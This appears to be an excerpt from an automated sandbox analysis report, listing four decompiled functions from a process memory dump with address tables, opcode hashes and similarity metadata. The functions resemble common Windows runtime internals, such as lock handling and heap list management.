                                                      • Instruction Fuzzy Hash: F0519F76B001259FCB14CF18C8909BDB7B6FB8A70171588FAE8469B314E734BE51DB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 049CAE44, Relevance: .2, Instructions: 152COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 86%
                                                      			E049CAE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E049CC38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E049CACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E049CFDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E049CEA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E04927D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E049C1608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E049D1536(0x49f8ae4, (_t74 -  *0x49f8b04 >> 0x14) + (_t74 -  *0x49f8b04 >> 0x14), _t88, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L049CC323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E049CA80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E049ACB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
						_t36 = E049CACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}



















                                                      0x049cae44
                                                      0x049cae4c
                                                      0x049cae53
                                                      0x049cae55
                                                      0x049cae5c
                                                      0x049cae64
                                                      0x049cae68
                                                      0x049cae75
                                                      0x049cae75
                                                      0x049cae78
                                                      0x049cae7a
                                                      0x049cae7c
                                                      0x049cae7f
                                                      0x049caea8
                                                      0x049caeab
                                                      0x049caead
                                                      0x00000000
                                                      0x00000000
                                                      0x049caeb3
                                                      0x049caeb8
                                                      0x049caebb
                                                      0x049caebd
                                                      0x00000000
                                                      0x049cae81
                                                      0x049cae88
                                                      0x049cae8f
                                                      0x049cae9b
                                                      0x049cae96
                                                      0x049cae96
                                                      0x049cae96
                                                      0x049caea0
                                                      0x049caea3
                                                      0x049caebf
                                                      0x049caebf
                                                      0x049caec3
                                                      0x049caec9
                                                      0x049caf0d
                                                      0x049caf14
                                                      0x049caf3d
                                                      0x049caf3d
                                                      0x049caf41
                                                      0x049caf44
                                                      0x049caf67
                                                      0x049caf67
                                                      0x049caf6a
                                                      0x049cafca
                                                      0x049cafd1
                                                      0x00000000
                                                      0x049cafd1
                                                      0x049caf6c
                                                      0x049caf6d
                                                      0x049caf75
                                                      0x049caf7c
                                                      0x049caf7e
                                                      0x049caf80
                                                      0x049caf85
                                                      0x049caf87
                                                      0x049caf99
                                                      0x049caf89
                                                      0x049caf92
                                                      0x049caf92
                                                      0x049caf9e
                                                      0x049cafa1
                                                      0x049cafa3
                                                      0x049cafa9
                                                      0x049cafb0
                                                      0x049cafb2
                                                      0x049cafb4
                                                      0x049cafbc
                                                      0x049cafbc
                                                      0x049cafb4
                                                      0x049cafb0
                                                      0x00000000
                                                      0x049cafa1
                                                      0x049caf4f
                                                      0x049caf57
                                                      0x049caf5c
                                                      0x049caf5e
                                                      0x00000000
                                                      0x00000000
                                                      0x049caf60
                                                      0x049caf64
                                                      0x049caf64
                                                      0x00000000
                                                      0x049caf64
                                                      0x049caf1a
                                                      0x049caf25
                                                      0x00000000
                                                      0x00000000
                                                      0x049caf27
                                                      0x049caf28
                                                      0x049caf33
                                                      0x00000000
                                                      0x049caed0
                                                      0x049caed0
                                                      0x049caed2
                                                      0x049caee1
                                                      0x049caee4
                                                      0x00000000
                                                      0x00000000
                                                      0x049caee6
                                                      0x049caeec
                                                      0x00000000
                                                      0x00000000
                                                      0x049caefb
                                                      0x049caf07
                                                      0x049cafd3
                                                      0x049cafdb
                                                      0x049cafdb
                                                      0x00000000
                                                      0x049caf07
                                                      0x049caed6
                                                      0x049caed8
                                                      0x049caedf
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x049caedf
                                                      0x049caec9

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 97bf0e9e4e59347bf9a22a22803fcd1f290a738fd2163e5b94103ea0c07f5713
                                                      • Instruction ID: fa05ab82e3b83a512a629d724d61c979040dbe6032b11293f12db402c0ef0136
                                                      • Opcode Fuzzy Hash: 97bf0e9e4e59347bf9a22a22803fcd1f290a738fd2163e5b94103ea0c07f5713
                                                      • Instruction Fuzzy Hash: 3041E5717402199BEB25DF25C898B7BB79EEF84714F04463DF81687290DB74F801C6A2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0492DBE9, Relevance: .1, Instructions: 149COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 86%
                                                      			E0492DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E0490CC50(E04904510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E04927D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E049D8ED6(_t102, _t98);
						}
						_t76 = _v44;
						E04922280(_t58, _v44);
						E0492DD82(_v44, _t102, _t98);
						E0492B944(_t102, _v5);
						return E0491FFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x49f8628; // 0x0
							_v28 = _t67;
							_t68 =  *0x49f862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x49f8628; // 0x0
						_t105 = _v28;
						_t80 =  *0x49f862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x49cfb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}









































                                                      0x0492dbe9
                                                      0x0492dbf2
                                                      0x0492dbf7
                                                      0x0492dbf9
                                                      0x0492dbfc
                                                      0x0492dc00
                                                      0x0492dc03
                                                      0x0492dc14
                                                      0x0492dd54
                                                      0x0492dd54
                                                      0x0492dd54
                                                      0x0492dc18
                                                      0x0492dc1d
                                                      0x0492dc1d
                                                      0x0492dc32
                                                      0x0492dc3b
                                                      0x0492dc3e
                                                      0x0492dc46
                                                      0x0492dd5b
                                                      0x0492dd62
                                                      0x0492dd64
                                                      0x0492dd67
                                                      0x0492dd69
                                                      0x0492dd6b
                                                      0x0492dd6e
                                                      0x0492dd70
                                                      0x0492dd73
                                                      0x0492dd73
                                                      0x00000000
                                                      0x0492dc4c
                                                      0x0492dc4e
                                                      0x04973ae3
                                                      0x04973ae8
                                                      0x04973aea
                                                      0x0492dce7
                                                      0x0492dce9
                                                      0x0492dcec
                                                      0x0492dcee
                                                      0x0492dcf0
                                                      0x0492dcf3
                                                      0x0492dcf5
                                                      0x04973af2
                                                      0x04973af5
                                                      0x04973af5
                                                      0x0492dd06
                                                      0x0492dd08
                                                      0x0492dd0b
                                                      0x0492dd12
                                                      0x04973b08
                                                      0x0492dd18
                                                      0x0492dd18
                                                      0x0492dd18
                                                      0x0492dd20
                                                      0x0492dd23
                                                      0x04973b16
                                                      0x04973b16
                                                      0x0492dd29
                                                      0x0492dd2d
                                                      0x0492dd36
                                                      0x0492dd40
                                                      0x0492dd51
                                                      0x0492dd51
                                                      0x0492dc54
                                                      0x0492dc59
                                                      0x0492dc59
                                                      0x0492dc5e
                                                      0x0492dc5e
                                                      0x0492dc63
                                                      0x0492dc66
                                                      0x0492dc6b
                                                      0x0492dc78
                                                      0x0492dc7b
                                                      0x0492dc81
                                                      0x0492dc81
                                                      0x0492dc83
                                                      0x0492dc89
                                                      0x00000000
                                                      0x00000000
                                                      0x0492dd7b
                                                      0x0492dd7b
                                                      0x0492dc8f
                                                      0x0492dc8f
                                                      0x0492dc92
                                                      0x0492dc99
                                                      0x0492dc9f
                                                      0x0492dca5
                                                      0x0492dcaa
                                                      0x0492dcaa
                                                      0x0492dcb3
                                                      0x0492dcb8
                                                      0x0492dcbb
                                                      0x0492dcc1
                                                      0x0492dccf
                                                      0x0492dcd2
                                                      0x0492dcd5
                                                      0x0492dcd7
                                                      0x0492dcda
                                                      0x0492dcdc
                                                      0x0492dcdc
                                                      0x0492dce2
                                                      0x0492dce4
                                                      0x00000000
                                                      0x0492dce4

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d0adf2b9c683bbe704f7f6618f201a904c5ec147ac37aebec882af28dee74310
                                                      • Instruction ID: fa054def9fb4a7d3dfa2e1a375781808b371acccbc9a228e9a30d7a59ced77d2
                                                      • Opcode Fuzzy Hash: d0adf2b9c683bbe704f7f6618f201a904c5ec147ac37aebec882af28dee74310
                                                      • Instruction Fuzzy Hash: 72519E71A01625DFCB14DF68C580AAEBBF5FB88310F20867AD955A7348EB70BD44CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0491EF40, Relevance: .1, Instructions: 147COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 96%
                                                      			E0491EF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E04909080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x772ac21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E04902D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}




























                                                      0x0491ef4b
                                                      0x0491ef4d
                                                      0x0491ef57
                                                      0x0491f0bd
                                                      0x0491f0c2
                                                      0x0491f0d2
                                                      0x0491f0d2
                                                      0x0491f0c2
                                                      0x0491ef5d
                                                      0x0491ef5f
                                                      0x0491ef67
                                                      0x0491ef6a
                                                      0x0491ef6d
                                                      0x0491ef74
                                                      0x0491ef7f
                                                      0x0491ef82
                                                      0x0491ef82
                                                      0x0491ef86
                                                      0x0491ef88
                                                      0x0491ef8c
                                                      0x0491ef8f
                                                      0x0491ef8f
                                                      0x0491ef8f
                                                      0x00000000
                                                      0x0491ef91
                                                      0x0491ef93
                                                      0x0491efc4
                                                      0x0491efc4
                                                      0x0491efc4
                                                      0x0491efca
                                                      0x0491efd0
                                                      0x0491f0a6
                                                      0x00000000
                                                      0x00000000
                                                      0x0491f0af
                                                      0x0496bb06
                                                      0x0496bb0a
                                                      0x0491f0b5
                                                      0x0491f0b5
                                                      0x0491f0b5
                                                      0x0491f0b5
                                                      0x00000000
                                                      0x0491efd6
                                                      0x0491efd9
                                                      0x0491f0de
                                                      0x0491f0e2
                                                      0x0491efdf
                                                      0x0491efdf
                                                      0x0491efdf
                                                      0x0491efe5
                                                      0x0496bafc
                                                      0x0496bafc
                                                      0x0491efe5
                                                      0x0491efeb
                                                      0x0491efed
                                                      0x0491f00f
                                                      0x0491f011
                                                      0x0491f01a
                                                      0x0491f01d
                                                      0x0491f021
                                                      0x0491f028
                                                      0x0491f029
                                                      0x0491f029
                                                      0x0491f02c
                                                      0x00000000
                                                      0x0491f02c
                                                      0x0491eff3
                                                      0x0491eff9
                                                      0x0491f0ea
                                                      0x0491f0ed
                                                      0x0491f0ef
                                                      0x00000000
                                                      0x0491f0ef
                                                      0x0491f003
                                                      0x0496bb12
                                                      0x0491f045
                                                      0x0491f049
                                                      0x0491f051
                                                      0x0491f09e
                                                      0x0491f0a0
                                                      0x0491f0a0
                                                      0x0491f09e
                                                      0x0491f053
                                                      0x0491f064
                                                      0x0491f064
                                                      0x0491f06b
                                                      0x0496bb1a
                                                      0x0496bb1a
                                                      0x0491f071
                                                      0x0491f071
                                                      0x0491f07d
                                                      0x0491f082
                                                      0x0491f08f
                                                      0x0491f08f
                                                      0x0491f009
                                                      0x0491f00d
                                                      0x00000000
                                                      0x0491f00d
                                                      0x0491efd0
                                                      0x0491ef97
                                                      0x0491efa5
                                                      0x0491efaa
                                                      0x00000000
                                                      0x0491efac
                                                      0x0491efac
                                                      0x0491efac
                                                      0x00000000
                                                      0x0491efb2
                                                      0x0491f036
                                                      0x0491f03a
                                                      0x0491f040
                                                      0x0491f090
                                                      0x00000000
                                                      0x0491f092
                                                      0x0491f042
                                                      0x00000000
                                                      0x0491f042
                                                      0x0491efb7
                                                      0x0491efb9
                                                      0x0491efbc
                                                      0x0491efb0
                                                      0x0491efb0
                                                      0x00000000
                                                      0x0491efbe
                                                      0x0491efbe
                                                      0x0491efc1
                                                      0x00000000
                                                      0x0491efc1
                                                      0x0491efbc
                                                      0x0491efaa
                                                      0x0491ef91

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                      • Instruction ID: e6626c5c0c00961ef9dbfb6e42f50a84048c3419f89aa0f01a7d21ea01331368
                                                      • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                      • Instruction Fuzzy Hash: FF510130A0424DDFDF20CF68C190BAEBBB6AF05314F1881B8D945973A1D375B989D751
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 049D740D, Relevance: .1, Instructions: 141COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 84%
                                                      			E049D740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E0495D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E0494F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L04924620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L04924620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E0494F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L04924620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}





















                                                      0x049d740d
                                                      0x049d740d
                                                      0x049d7412
                                                      0x049d7413
                                                      0x049d7416
                                                      0x049d7418
                                                      0x049d741c
                                                      0x049d741f
                                                      0x049d7422
                                                      0x049d7422
                                                      0x049d7428
                                                      0x049d742a
                                                      0x049d742a
                                                      0x049d7451
                                                      0x049d7432
                                                      0x049d744f
                                                      0x049d744f
                                                      0x00000000
                                                      0x049d7434
                                                      0x049d7438
                                                      0x049d7443
                                                      0x049d7517
                                                      0x049d7517
                                                      0x049d751a
                                                      0x049d7535
                                                      0x049d7520
                                                      0x049d7527
                                                      0x049d752c
                                                      0x049d7531
                                                      0x049d7533
                                                      0x00000000
                                                      0x049d7533
                                                      0x00000000
                                                      0x049d7531
                                                      0x049d754b
                                                      0x049d754f
                                                      0x049d755c
                                                      0x049d755c
                                                      0x049d755f
                                                      0x049d7560
                                                      0x049d7561
                                                      0x049d7562
                                                      0x049d7563
                                                      0x049d7568
                                                      0x049d756a
                                                      0x049d756c
                                                      0x049d756d
                                                      0x049d756d
                                                      0x049d756f
                                                      0x049d7572
                                                      0x049d7574
                                                      0x049d7577
                                                      0x049d757c
                                                      0x049d757f
                                                      0x00000000
                                                      0x049d7551
                                                      0x049d7551
                                                      0x049d7551
                                                      0x049d7553
                                                      0x049d7553
                                                      0x049d7449
                                                      0x049d7449
                                                      0x049d744c
                                                      0x049d744c
                                                      0x00000000
                                                      0x049d744c
                                                      0x049d7443
                                                      0x049d750e
                                                      0x049d7514
                                                      0x049d7514
                                                      0x049d7455
                                                      0x049d7469
                                                      0x049d746d
                                                      0x00000000
                                                      0x049d7473
                                                      0x049d7473
                                                      0x049d7476
                                                      0x049d7480
                                                      0x049d7484
                                                      0x049d748e
                                                      0x049d7493
                                                      0x049d7493
                                                      0x049d7496
                                                      0x049d7499
                                                      0x049d74a1
                                                      0x049d74b1
                                                      0x049d74b5
                                                      0x00000000
                                                      0x049d74bb
                                                      0x049d74c1
                                                      0x049d74c1
                                                      0x049d74c4
                                                      0x049d74c5
                                                      0x049d74c6
                                                      0x049d74c7
                                                      0x049d74c8
                                                      0x049d74cd
                                                      0x00000000
                                                      0x049d74d3
                                                      0x049d74d3
                                                      0x049d74d6
                                                      0x049d74d8
                                                      0x049d74db
                                                      0x049d74dd
                                                      0x049d74e0
                                                      0x049d74e7
                                                      0x049d74ee
                                                      0x049d74ee
                                                      0x049d74f4
                                                      0x049d74f9
                                                      0x00000000
                                                      0x049d74fb
                                                      0x049d74fb
                                                      0x049d74fd
                                                      0x049d7500
                                                      0x049d7503
                                                      0x049d7505
                                                      0x049d7505
                                                      0x049d74f9
                                                      0x00000000
                                                      0x049d74cd
